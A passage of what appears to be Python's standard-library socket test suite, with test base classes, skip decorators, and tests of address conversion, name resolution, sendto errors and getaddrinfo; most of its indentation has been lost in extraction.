# cli_addr will be set to the addresses of the endpoints.
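# For example, a hypothetical combined base roughly equivalent to
# SocketConnectedTest would be:
#   class TCPConnectedTest(ConnectedStreamTestMixin, TCPTestBase):
#       pass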
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
        if fqhn not in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
            # assumption-breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
        # it's reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
